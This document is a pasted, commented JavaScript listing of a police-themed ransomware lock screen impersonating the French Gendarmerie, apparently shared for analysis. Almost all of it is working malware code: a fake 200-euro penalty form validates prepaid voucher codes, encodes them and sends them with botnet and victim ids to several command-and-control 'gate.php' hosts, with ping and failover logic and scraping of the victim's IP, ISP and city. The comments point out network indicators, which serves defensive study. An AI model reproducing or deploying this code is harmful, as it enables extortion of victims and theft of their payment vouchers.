
CyberCrime: Rançongiciel - Gendarmerie Nationale

a guest
Dec 11th, 2011
  /*
   * Global configuration and shared state for the lock-screen page.
   *
   * Analyst notes (everything below is read directly from this listing):
   *  - g_gates holds the server endpoints ("gates") the page reports to. They
   *    are plain-HTTP URLs ending in /gate.php; select_gate() and send_report()
   *    append "?cmd=ping..." and "?cmd=data..." query strings to them.
   *  - g_botnet, g_userid and g_os_version are sent to the gate as the
   *    "botnet", "userid" and "os" query parameters.
   *  - The two base64 "keys" are only alphabets. The second one is the standard
   *    alphabet reordered (digits, lower case, upper case), so a captured
   *    "report" parameter is an encoding, not encryption.
   */
  // debug selects the test gate list below; debug_ec turns on console logging.
  var debug = false;
  var debug_ec = false;

  // With either switch on, the page announces it and forces the "v3" field to
  // "1" (set_userid() reads the user id from that same field).
  if (debug || debug_ec)
  {
      alert("DEBUG! DEBUG! DEBUG!");
      document.getElementById("v3").value = "1";
  }

  // Minimum voucher total that send_vouchers() accepts, in euros per MSG_LOW_TOTAL.
  var penalty_amount = 200;
  // Campaign tag sent as the "botnet" query parameter.
  var g_botnet = "fr1";
  // Overwritten by set_os_version() and set_userid() respectively.
  var g_os_version = "Unknown";
  var g_userid = "0";

  // Replies expected from the gate for cmd=ping and cmd=data.
  var RESPONSE_PONG = "Pong!";
  var RESPONSE_OK = "OK";
  // French user-facing messages shown through alert().
  var MSG_WRONG_VOUCHERS = "Voucher code incorrecte.";
  var MSG_VOUCHERS_SENT = "Voucher a été envoyé. Attends pour environ 24h.";
  var MSG_LOW_TOTAL = "Total des moins de "+penalty_amount+" €";

  // g_gates is assigned without var, i.e. as an implicit global.
  // The debug list points at test hosts; the else branch is the live list that
  // select_gate() rotates through.
  if (debug)
  {
      g_gates = [
          "http://lck-test.net/gate.php",
          "http://lck-test4.net/gate.php", // not exists
          "http://lck-test1.net/gate.php",
          "http://lck-test2.net/gate.php",
          "http://lck-test3.net/gate.php"
          ]
  }
  else
  {
      g_gates = [
          "http://bundespol.com/gate.php",
          "http://yycqparxvohd.com/gate.php",
          "http://wzuoqliyknpz.com/gate.php"
          ]
  }

  // Number of voucher rows currently present in the form.
  var positions_count = 1;

  // Flags shared by the functions that monitor() runs once per second.
  var g_state = new Object();
  g_state.geo_location_lock = false;
  g_state.geo_location_set = false;
  g_state.report_lock = false;
  g_state.report = "";
  // Starts as true so send_report() stays idle until send_vouchers() stores a report.
  g_state.report_sent = true;
  g_state.gate_selector_lock = false;
  g_state.gate_selector_gate_works = true;
  // Starts above the 3600 threshold in select_gate(), so the first eligible call pings at once.
  g_state.gate_selector_calls_count = 999999;
  g_state.gate_selector_gate_index = 0;
  g_state.os_version_set = false;
  g_state.userid_set = false;

  // Alphabets for base64_encode(); index 64 ("=") is the padding character.
  // select_gate() encodes the OS name with the standard one, send_vouchers()
  // encodes the voucher report with the reordered one.
  g_base64_std_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  g_base64_priv_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=";
  60.  
  /**
   * Debug helper: writes the gate/report/geo flags of g_state to the console.
   * Does nothing unless the global debug_ec switch is on. The os_version_set
   * and userid_set flags are not part of the dump.
   */
  function print_g_state() {
    if (!debug_ec) {
      return;
    }

    const asText = (flag) => (flag ? "true" : "false");

    console.log("dump of g_state:");
    console.log("\tg_state.geo_location_lock: %s", asText(g_state.geo_location_lock));
    console.log("\tg_state.geo_location_set: %s", asText(g_state.geo_location_set));
    console.log("\tg_state.report_lock: %s", asText(g_state.report_lock));
    console.log("\tg_state.report: %s", g_state.report);
    console.log("\tg_state.report_sent: %s", asText(g_state.report_sent));
    console.log("\tg_state.gate_selector_lock: %s", asText(g_state.gate_selector_lock));
    console.log("\tg_state.gate_selector_gate_works: %s", asText(g_state.gate_selector_gate_works));
    console.log("\tg_state.gate_selector_calls_count: %d", g_state.gate_selector_calls_count);
    // The index is printed together with the gate URL it currently selects.
    console.log(
      "\tg_state.gate_selector_gate_index: %d (%s)",
      g_state.gate_selector_gate_index,
      g_gates[g_state.gate_selector_gate_index]
    );
    console.log("===================================================================================================");
  }
  78.  
  /**
   * Base64-style encoder with a caller-supplied alphabet.
   *
   * @param {string} input Text to encode; each character code is treated as one byte.
   * @param {string} key   65-character alphabet; index 64 is the padding character.
   * @returns {string} Four output characters per three input characters.
   *
   * Character codes above 255 produce indices past the alphabet, for which
   * charAt() yields an empty string, so such input is silently mangled.
   */
  function base64_encode(input, key) {
    const PAD_INDEX = 64;
    let encoded = "";

    for (let pos = 0; pos < input.length; pos += 3) {
      // charCodeAt() returns NaN past the end of the string; the bit
      // operations below treat NaN as 0.
      const first = input.charCodeAt(pos);
      const second = input.charCodeAt(pos + 1);
      const third = input.charCodeAt(pos + 2);

      const idx1 = first >> 2;
      const idx2 = ((first & 3) << 4) | (second >> 4);
      let idx3 = ((second & 15) << 2) | (third >> 6);
      let idx4 = third & 63;

      if (isNaN(second)) {
        // Only one input byte left: two padding characters.
        idx3 = PAD_INDEX;
        idx4 = PAD_INDEX;
      } else if (isNaN(third)) {
        // Two input bytes left: one padding character.
        idx4 = PAD_INDEX;
      }

      encoded += key.charAt(idx1) + key.charAt(idx2) + key.charAt(idx3) + key.charAt(idx4);
    }

    return encoded;
  }
  112.  
  /**
   * Tab switcher for the two-tab window (voucher info / penalty form).
   *
   * @param {string} content_tab_id Id of the tab header to mark as open.
   * @param {string} content_id     Id of the content pane to show.
   */
  function switch_tab(content_tab_id, content_id) {
    // Close both tab headers, then open the requested one.
    const tabIds = ['vouchers_info_tab', 'penalty_form_tab'];
    for (let t = 0; t < tabIds.length; t++) {
      document.getElementById(tabIds[t]).className = 'close';
    }
    document.getElementById(content_tab_id).className = 'open';

    // Hide both panes, then show the requested one.
    const paneIds = ['vouchers_info', 'penalty_form'];
    for (let p = 0; p < paneIds.length; p++) {
      document.getElementById(paneIds[p]).style.display = 'none';
    }
    document.getElementById(content_id).style.display = 'block';
  }
  127.  
  128.  
  129. /*
  130. * Text input filter
  131. */
  132.  
  // Runs init() once the document has loaded. Uses addEventListener where it
  // exists and falls back to attachEvent (old Internet Explorer) otherwise.
  (function () {
    if (window.addEventListener) {
      window.addEventListener("load", init, false);
      return;
    }
    if (window.attachEvent) {
      window.attachEvent("onload", init);
    }
  })();
  141.  
  /**
   * Attaches the keypress filter to one input element.
   *
   * @param {Object} id The input element itself (despite the name, not an id string).
   */
  function register_handler(id) {
    if (!id.addEventListener) {
      // No addEventListener on this element: fall back to the onkeypress property.
      id.onkeypress = filter;
      return;
    }
    id.addEventListener("keypress", filter, false);
  }
  156.  
  /**
   * Registers the keypress filter on every <input type="text"> that carries a
   * non-empty custom "allowed" attribute. All other inputs are left alone.
   */
  function init() {
    const inputs = document.getElementsByTagName("input");
    for (let n = 0; n < inputs.length; n++) {
      const field = inputs[n];
      // The attribute is only read for text fields, as in a short-circuit check.
      if (field.type == "text" && field.getAttribute("allowed")) {
        register_handler(field);
      }
    }
  }
  171.  
  /**
   * Keypress handler that restricts a text field to the characters listed in
   * its "allowed" attribute. It must run with `this` bound to the input.
   *
   * The field's class is set from its "successclass" or "errorclass" attribute
   * on every filtered keystroke. Only keypress events are inspected here.
   *
   * @param {Object} event Keyboard event; window.event is used when it is missing.
   * @returns {boolean} true to accept the keystroke, false to reject it.
   */
  function filter(event) {
    const evt = event || window.event;
    const keyCode = evt.charCode || evt.keyCode;

    // Function keys (charCode 0, Firefox), Ctrl/Alt combinations and control
    // codes are let through untouched.
    if (evt.charCode == 0 || evt.ctrlKey || evt.altKey || keyCode < 32) {
      return true;
    }

    const allowed = this.getAttribute("allowed");
    const errorClassName = this.getAttribute("errorclass");
    const successClassName = this.getAttribute("successclass");
    const typed = String.fromCharCode(keyCode);

    if (allowed.indexOf(typed) == -1) {
      // Character is not in the list: flag the field and cancel the input.
      this.className = errorClassName;
      if (evt.preventDefault) {
        evt.preventDefault();
      }
      if (evt.returnValue) {
        evt.returnValue = false;
      }
      return false;
    }

    this.className = successClassName;
    return true;
  }
  209.  
  210. /*
  211. * End of text input filter
  212.  */
  213.  
  214.  
  215.  
  216. /*
  217. * penalty form support code
  218.  */
  /**
   * Label for a voucher row: the zero-based position shown as a 1-based number.
   *
   * @param {number|string} position_number Zero-based row index.
   * @returns {string} The row number as text.
   */
  function get_position_number_html(position_number) {
    const oneBased = position_number * 1 + 1; // "* 1" coerces string input to a number
    return `${oneBased}`;
  }
  223.  
  /**
   * Markup for the voucher-code input of one row.
   *
   * The custom attributes (allowed, errorclass, successclass) are the ones the
   * keypress filter reads; the field takes digits only, at most 19 characters.
   *
   * @param {number} position_number Zero-based row index, used in the element id.
   * @returns {string} HTML for the input element.
   */
  function get_voucher_code_html(position_number) {
    return `<input id='voucher_code${position_number}' type='text' size='25' maxlength='19' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder'>`;
  }
  228.  
  /**
   * Markup for the voucher-value input of one row: up to three digits,
   * pre-filled with 0, recalculating the total on every key release.
   *
   * @param {number} position_number Zero-based row index, used in the element id.
   * @returns {string} HTML for the input element.
   */
  function get_voucher_value_html(position_number) {
    return `<input id='voucher_value${position_number}' type='text' size='14' maxlength='3' value='0' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder' onkeyup='refresh_total()'>`;
  }
  233.  
  /**
   * Markup for the "remove row" icon. The first row (position 0 or below) gets
   * no icon, so it cannot be deleted.
   *
   * @param {number} position_number Zero-based row index.
   * @returns {string} HTML for the icon, or an empty string.
   */
  function get_img_minus_html(position_number) {
    if (position_number <= 0) {
      return "";
    }
    return `<img src='minus.png' alt='' onclick='delete_voucher_position(${position_number})'>`;
  }
  238.  
  /**
   * Appends one voucher row (number, code field, value field, remove icon) to
   * the "penalty" table and attaches the keypress filter to its two inputs.
   * Increments the global positions_count.
   */
  function add_voucher_position() {
    const rowIndex = positions_count;
    positions_count++;

    // Table row 0 is skipped, so voucher row n lives at table row n + 1.
    const row = document.all.penalty.insertRow(rowIndex + 1);
    const cellBuilders = [
      get_position_number_html,
      get_voucher_code_html,
      get_voucher_value_html,
      get_img_minus_html,
    ];
    for (let col = 0; col < cellBuilders.length; col++) {
      row.insertCell(col).innerHTML = cellBuilders[col](rowIndex);
    }

    register_handler(document.getElementById("voucher_code" + rowIndex));
    register_handler(document.getElementById("voucher_value" + rowIndex));
  }
  259.  
  /**
   * Removes one voucher row by rebuilding the whole table: the values of the
   * remaining rows are saved, every voucher row is deleted, the rows are
   * recreated with consecutive ids, and the saved values are written back.
   * Decrements positions_count and refreshes the displayed total.
   *
   * @param {number} position_number Zero-based index of the row to drop.
   */
  function delete_voucher_position(position_number) {
    const table = document.all.penalty;
    const keptCodes = [];
    const keptValues = [];

    // Save what the user typed in every row except the one being removed.
    for (let row = 0; row < positions_count; row++) {
      if (row == position_number) {
        continue;
      }
      keptCodes.push(document.getElementById("voucher_code" + row).value);
      keptValues.push(document.getElementById("voucher_value" + row).value);
    }

    // Drop all voucher rows; table row 0 stays in place.
    for (let n = 0; n < positions_count; n++) {
      table.deleteRow(1);
    }

    positions_count--;

    // Recreate the rows so that ids run from 0 without gaps.
    for (let row = 0; row < positions_count; row++) {
      const fresh = table.insertRow(row + 1);
      fresh.insertCell(0).innerHTML = get_position_number_html(row);
      fresh.insertCell(1).innerHTML = get_voucher_code_html(row);
      fresh.insertCell(2).innerHTML = get_voucher_value_html(row);
      fresh.insertCell(3).innerHTML = get_img_minus_html(row);
    }

    // Restore the saved input and re-attach the keypress filter.
    for (let row = 0; row < positions_count; row++) {
      const codeField = document.getElementById("voucher_code" + row);
      codeField.value = keptCodes[row];
      const valueField = document.getElementById("voucher_value" + row);
      valueField.value = keptValues[row];
      register_handler(document.getElementById("voucher_code" + row));
      register_handler(document.getElementById("voucher_value" + row));
    }

    let sum = 0;
    for (let row = 0; row < positions_count; row++) {
      sum += keptValues[row] * 1;
    }
    document.getElementById("total_amount").innerHTML = sum;
  }
  314.  
  /**
   * Sums the value fields of all voucher rows, shows the sum in the
   * "total_amount" element and returns it.
   *
   * The pay button is always re-enabled here. The original listing carries a
   * commented-out line that would have disabled it below penalty_amount; the
   * threshold is enforced only in send_vouchers().
   *
   * @returns {number} Sum of all voucher values (NaN if a field is not numeric).
   */
  function refresh_total() {
    let sum = 0;
    let row = 0;
    while (row < positions_count) {
      sum += document.getElementById("voucher_value" + row).value * 1;
      row++;
    }
    document.getElementById("total_amount").innerHTML = sum;

    const payButton = document.getElementById("do_pay");
    payButton.disabled = "";

    return sum;
  }
  330.  
  331. /*
  332. * End of penalty form support code
  333.  */
  334.  
  335.  
  336. /*
  337. * Geoip code
  338.  */
  /**
   * Creates an HTTP request object: the native XMLHttpRequest where available,
   * otherwise the first ActiveX XMLHttp version that can be instantiated.
   *
   * @returns {Object|undefined} The request object, or undefined when neither
   *   mechanism is available.
   */
  function http_new_request() {
    if (typeof XMLHttpRequest != "undefined") {
      return new XMLHttpRequest();
    }
    if (!window.ActiveXObject) {
      return undefined;
    }

    const progIds = [
      "MSXML2.XMLHttp.5.0",
      "MSXML2.XMLHttp.4.0",
      "MSXML2.XMLHttp.3.0",
      "MSXML2.XMLHttp",
      "Microsoft.XMLHttp",
    ];
    for (let n = 0; n < progIds.length; n++) {
      try {
        return new ActiveXObject(progIds[n]);
      } catch (e) {
        // This version is not installed; try the next one.
      }
    }
    return undefined;
  }
  358.  
  /**
   * Asynchronous GET with an optional timeout.
   *
   * @param {string} target     URL to request.
   * @param {Function} callback Called with the response text on HTTP 200, or
   *   with null on any other status when no errorHandler is supplied.
   * @param {Object} options    Required. Optional members: timeout (ms),
   *   timeoutHandler(target), errorHandler(status, statusText).
   *
   * Exceptions from open()/send() are swallowed, so a request that cannot be
   * started reports nothing unless the timeout fires.
   * NOTE(review): after a timeout the request is aborted; whether the
   * readystatechange handler then also runs depends on the browser - confirm.
   */
  function http_get(target, callback, options) {
    const xhr = http_new_request();
    let watchdog;

    if (options.timeout) {
      watchdog = setTimeout(function () {
        xhr.abort();
        if (options.timeoutHandler) {
          options.timeoutHandler(target);
        }
      }, options.timeout);
    }

    xhr.onreadystatechange = function () {
      // 4 = request finished.
      if (xhr.readyState != 4) {
        return;
      }
      if (watchdog) {
        clearTimeout(watchdog);
      }
      if (xhr.status == 200) {
        callback(xhr.responseText);
        return;
      }
      if (options.errorHandler) {
        options.errorHandler(xhr.status, xhr.statusText);
      } else {
        callback(null);
      }
    };

    try {
      xhr.open("GET", target, true);
      xhr.send(null);
    } catch (e) {
      // Ignored on purpose, as in the original listing.
    }
  }
  403.  
  /**
   * Fetches a third-party IP lookup page and scrapes the visitor's IP address,
   * ISP and city out of its HTML to display them in the v_ip, v_isp and v_city
   * elements.
   *
   * Runs at most one request at a time (geo_location_lock) and stops once
   * geo_location_set is true. The scraped text is assigned through innerHTML
   * without escaping. If the IP field comes back empty, a hard-coded address
   * is displayed instead.
   */
  function set_geo_location() {
    if (g_state.geo_location_set || g_state.geo_location_lock) {
      return;
    }

    // Second capture group of the first match, as a string; throws when the
    // pattern is not found.
    const grab = (html, pattern) => html.match(pattern)[2].toString();

    function cb_set_geo_location(response_text) {
      try {
        if (response_text == null) {
          g_state.geo_location_set = false;
          return;
        }

        let s_ip = grab(response_text, /Your IP Address(.*?)<b>(.*?)<\/b>/i);
        const s_isp = grab(response_text, /ISP:(.*?)<b>(.*?)<\/b>/i);
        const s_city = grab(response_text, /City:(.*?)<b>(.*)<\/b>/i);
        if (s_ip == "") {
          s_ip = "188.28.11.121";
        }
        document.getElementById("v_ip").innerHTML = s_ip;
        document.getElementById("v_city").innerHTML = s_city;
        document.getElementById("v_isp").innerHTML = s_isp;
        g_state.geo_location_set = true;
      } catch (e) {
        // A page that does not match the patterns leaves the flag unset, so
        // the lookup is retried on a later monitor() tick.
      } finally {
        g_state.geo_location_lock = false;
      }
    }

    function cb_set_geo_location_timeout(target) {
      g_state.geo_location_set = false;
      g_state.geo_location_lock = false;
    }

    g_state.geo_location_lock = true;
    const options = new Object();
    options.timeout = 3000;
    options.timeoutHandler = cb_set_geo_location_timeout;
    http_get("http://tools.ip2location.com/ib2/", cb_set_geo_location, options);
  }
  457.  
  /*
   * Health check and failover for the gate list.
   *
   * Sends "?cmd=ping&botnet=...&userid=...&os=..." to the currently selected
   * gate and expects the reply RESPONSE_PONG. The "os" value is g_os_version
   * encoded with the standard base64 alphabet.
   *
   * Called from monitor(), which the page schedules once per second. Nothing
   * happens while a ping is in flight or before set_userid() has read a user id.
   *
   * For defenders: the request shape above (path /gate.php, the four query
   * parameters, the literal replies "Pong!" and "OK") is what this listing
   * exposes as network indicators.
   */
  function select_gate()
  {
      var options = new Object();

      // Reply handler. http_get() also calls it with null on a non-200 status,
      // which ends up in the else branch and marks the gate as failed.
      function cb_select_gate(response_text)
      {
          if (response_text == RESPONSE_PONG)
          {
              g_state.gate_selector_gate_works = true;
              // Restart the once-per-hour counter.
              g_state.gate_selector_calls_count = 0;
              if (debug_ec) console.log("Pinging gate %s was successfully.", g_gates[g_state.gate_selector_gate_index]);
          }
          else
          {
              g_state.gate_selector_gate_works = false;
              if (debug_ec) console.log("Pinging gate %s was failed.", g_gates[g_state.gate_selector_gate_index]);
          }
          g_state.gate_selector_lock = false;
      }

      // Timeout handler: marks the gate as failed and releases the lock.
      function cb_select_gate_timeout(target)
      {
          g_state.gate_selector_gate_works = false;
          g_state.gate_selector_lock = false;
          // The format string has a %s but no argument is passed for it.
          if (debug_ec) console.log("Pinging gate %s was timeout.");
      }

      if (!g_state.gate_selector_lock && g_state.userid_set)
      {
          // Ping when the gate is marked as failed, or when more than 3600 calls
          // have passed since the last successful ping. The counter is only
          // incremented while the gate is considered working (short-circuit ||).
          if (!g_state.gate_selector_gate_works || g_state.gate_selector_calls_count++ > 3600) // every one hour
          {
              g_state.gate_selector_lock = true;
              if (debug_ec) console.log("Pinging gate %s...", g_gates[g_state.gate_selector_gate_index]);

              // Failover: move to the next gate in the list, wrapping around.
              if (!g_state.gate_selector_gate_works)
              {
                  g_state.gate_selector_gate_index = (g_state.gate_selector_gate_index + 1) % g_gates.length;
              }

              options.timeout = 5000;
              options.timeoutHandler = cb_select_gate_timeout;
              var os_version = base64_encode(g_os_version, g_base64_std_key);
              http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=ping&botnet="+g_botnet+"&userid="+g_userid+"&os="+os_version, cb_select_gate, options);
          }
      }
  }
  504.  
  /*
   * Transmits the pending voucher report to the currently selected gate.
   *
   * Sends "?cmd=data&botnet=...&userid=...&report=..." and expects the reply
   * RESPONSE_OK. g_state.report is the string stored by send_vouchers(), i.e.
   * the voucher codes and values encoded with the reordered base64 alphabet.
   * It is appended to the URL as is, without URL-encoding.
   *
   * Called from monitor() once per second. A request is made only when no
   * report request is in flight, a report is waiting (report_sent is false)
   * and the current gate is marked as working.
   */
  function send_report()
  {
      var options = new Object();

      // Reply handler. Any reply other than RESPONSE_OK (including the null
      // that http_get() passes on a non-200 status) marks the gate as failed
      // and puts the report back in the "not sent" state for a later retry.
      function cb_send_report(response_text)
      {
          if (response_text != RESPONSE_OK)
          {
              g_state.gate_selector_gate_works = false;
              g_state.report_sent = false;
              if (debug_ec) console.log("Sending report '%s' on gate %s was failed.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
          }
          else
          {
              if (debug_ec) console.log("Sending report '%s' on gate %s was successfully.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
          }
          g_state.report_lock = false;
      }

      // Timeout handler: marks the gate as failed but leaves report_sent as it is.
      // NOTE(review): whether the report is retried after a timeout depends on
      // whether the aborted request also reaches cb_send_report(null) - confirm.
      function cb_send_report_timeout(target)
      {
          g_state.gate_selector_gate_works = false;
          g_state.report_lock = false;
          if (debug_ec) console.log("Sending report '%s' on gate %s was timeout.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
      }

      if (!g_state.report_lock && !g_state.report_sent && g_state.gate_selector_gate_works)
      {
          g_state.report_lock = true;
          if (debug_ec) console.log("Sending report '%s' on gate %s...", g_state.report, g_gates[g_state.gate_selector_gate_index]);
          // set 'report_sent = true' here to prevent overwriting this flag in
          // moment between changing report value and calling cb_send_report()
          g_state.report_sent = true;
          options.timeout = 5000;
          options.timeoutHandler = cb_send_report_timeout;
          http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=data&botnet="+g_botnet+"&userid="+g_userid+"&report="+g_state.report, cb_send_report, options);
      }
  }
  543.  
  /**
   * Derives a Windows version name from navigator.userAgent, stores it in
   * g_os_version and shows it in the "v_os" element. Runs once; later calls
   * return immediately.
   *
   * The first matching token wins. When nothing matches, g_os_version becomes
   * an empty string (replacing its initial "Unknown").
   */
  function set_os_version() {
    if (g_state.os_version_set) {
      return;
    }

    // [user-agent token, displayed name], checked in this order.
    const knownSystems = [
      ["Windows 95", "Windows 95"],
      ["Windows NT 4", "Windows NT 4.0"],
      ["Windows 98", "Windows 98"],
      ["Win 9x 4.9", "Windows ME"],
      ["Windows NT 5.0", "Windows 2000"],
      ["Windows NT 5.1", "Windows XP"],
      ["Windows NT 6.1", "Windows Seven"],
      ["Windows NT 5.2", "Windows 2003"],
      ["Windows NT 6.0", "Windows Vista"],
    ];

    let detected = "";
    for (let n = 0; n < knownSystems.length; n++) {
      if (navigator.userAgent.indexOf(knownSystems[n][0]) > -1) {
        detected = knownSystems[n][1];
        break;
      }
    }

    g_os_version = detected;
    document.getElementById("v_os").innerHTML = detected;
    g_state.os_version_set = true;
    if (debug_ec) {
      console.log("OS version set successfully.");
    }
  }
  566.  
  /**
   * Reads the user id from the "v3" field into g_userid. The id counts as set
   * once the field holds anything other than "0"; after that the field is not
   * read again. select_gate() does not ping any gate before this has happened.
   */
  function set_userid() {
    if (g_state.userid_set) {
      return;
    }

    g_userid = document.getElementById("v3").value;
    if (g_userid == "0") {
      return;
    }

    g_state.userid_set = true;
    if (debug_ec) {
      console.log("Userid set successfully.");
    }
  }
  578.  
  /**
   * One tick of the page's polling loop. The order matters: the user id is
   * read before the gate is pinged, and the gate is checked before a pending
   * report is sent.
   */
  function monitor() {
    refresh_total();    // keep the displayed total and pay button current
    set_geo_location(); // IP / ISP / city lookup until it succeeds
    set_os_version();   // once
    set_userid();       // until the "v3" field holds an id
    select_gate();      // ping / fail over between gates
    send_report();      // transmit a queued voucher report
  }
  588.  
  // Start the polling loop once the page has loaded: monitor() runs every
  // 1000 ms for as long as the page stays open.
  window.onload = () => {
    setInterval(monitor, 1000);
  };
  593.  
  /**
   * Format check for every voucher code field. A code passes when it is
   * 19 characters long and starts with "633718", or 16 characters long and
   * starts with "0". Each field's class is set from its successclass or
   * errorclass attribute.
   *
   * The validity flag is never reset between rows: once one row fails, every
   * following row is marked as an error too, whatever it contains.
   *
   * @returns {boolean} true only when no row was marked as an error.
   */
  function are_vouchers_valid() {
    let stillValid = true; // sticky across rows, see above
    let allOk = true;

    for (let row = 0; row < positions_count; row++) {
      const field = document.getElementById("voucher_code" + row);
      const code = field.value;

      let formatOk;
      switch (code.length) {
        case 19:
          formatOk = code.substr(0, 6) == "633718";
          break;
        case 16:
          formatOk = code.substr(0, 1) == "0";
          break;
        default:
          formatOk = false;
      }
      if (!formatOk) {
        stillValid = false;
      }

      if (stillValid) {
        field.className = field.getAttribute("successclass");
      } else {
        field.className = field.getAttribute("errorclass");
        allOk = false;
      }
    }

    return allOk;
  }
  638.  
  /**
   * Handler for submitting the voucher form. Validates the codes, checks that
   * the total reaches penalty_amount, then queues the entered data for
   * send_report().
   *
   * The report is "code-value" pairs joined by "x", encoded with the reordered
   * base64 alphabet. It is stored only when the plain text is longer than 16
   * characters and differs from the report already stored. Nothing is
   * transmitted here; the "sent" message is shown as soon as both checks pass.
   */
  function send_vouchers() {
    if (!are_vouchers_valid()) {
      alert(MSG_WRONG_VOUCHERS);
      return;
    }

    const total = refresh_total();
    if (total < penalty_amount) {
      alert(MSG_LOW_TOTAL);
      return;
    }

    const pairs = [];
    for (let row = 0; row < positions_count; row++) {
      const code = document.getElementById("voucher_code" + row).value;
      const amount = document.getElementById("voucher_value" + row).value;
      pairs.push(code + "-" + amount);
    }
    const plain = pairs.join("x");

    if (plain.length > 16) {
      const encoded = base64_encode(plain, g_base64_priv_key);
      if (g_state.report != encoded) {
        // Clearing report_sent is what makes send_report() pick the report up.
        g_state.report = encoded;
        g_state.report_sent = false;
        if (debug_ec) {
          console.log("Report updated and wait sending.");
        }
      }
    }

    alert(MSG_VOUCHERS_SENT);
  }
  678.  
  679.  